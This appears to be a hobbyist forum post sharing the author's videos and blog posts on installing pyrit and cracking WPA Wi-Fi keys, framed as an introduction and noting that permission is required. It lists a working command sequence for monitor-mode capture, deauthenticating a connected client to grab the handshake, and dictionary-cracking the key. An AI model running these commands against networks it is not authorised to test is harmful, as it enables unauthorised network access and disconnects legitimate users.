Hey all,

After the ssh video I decided to record the next one, these were initially just for my reference as I'm pretty forgetful, however g0tmi1k suggested I should publish them.

So first of all I looked at how to set-up/install pyrit, it has been covered in the How to section and this is where I got the commands from.
However I still recorded a video for it here:
Installing pyrit in bt5 Blip.tv

Blog post here:
j2neon.blogspot: Installing pyrit into BT5

There is other links on the bottom of the blog post for those who don't like blip.

Once pyrit was set-up and had been benchmarked, I looked at cracking WPA.

This is the same as cracking WPA with any other program!

Firstly it has to be your own router or you must have permission from the administrator.
Secondly the key that your cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecsurepass'.
Finally their access point has to have a client connected because during the process of capturing a handshake, the client is de-authenticated allowing the handshake to be recaptured.

Commands for using aircrack and pyrit:

airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid mon0
aireplay --deauth 0 -a bssid -c client mon

pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack -r wpadb output01.cap

Video Link:
Cracking WPA using pyrit/aircrack Blip.tv

j2neon.blogspot: Cracking WPA using pyrit and aircrack

Once again extra links on blog post

I know there are many ways of doing this and I know that I only used a low number of passwords in the list but this is just to give people an intro to using pyrit and what it can do!
Any suggestions and tips will be greatly appreciated.